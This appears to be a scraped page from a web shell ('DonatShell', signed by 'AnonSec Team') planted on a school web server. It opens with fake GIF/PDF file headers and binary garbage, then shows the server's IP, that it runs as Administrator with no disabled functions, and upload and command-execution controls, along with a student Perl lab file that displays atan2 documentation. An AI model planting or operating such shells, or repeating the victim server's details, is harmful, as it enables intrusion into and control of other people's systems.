GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/_Archive/CST1615/ExampleFiles/Lab01/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/_Archive/CST1615/ExampleFiles/Lab01/1-2.txt
C:\CST1615\Lab01>perldoc -u -f atan2
=over 8

=item atan2 Y,X
X<atan2> X<arctangent> X<tan> X<tangent>

Returns the arctangent of Y/X in the range -PI to PI.

For the tangent operation, you may use the C<Math::Trig::tan>
function, or use the familiar relation:

    sub tan { sin($_[0]) / cos($_[0])  }

The return value for C<atan2(0,0)> is implementation-defined; consult
your atan2(3) manpage for more information.

=back

Anon7 - 2022
AnonSec Team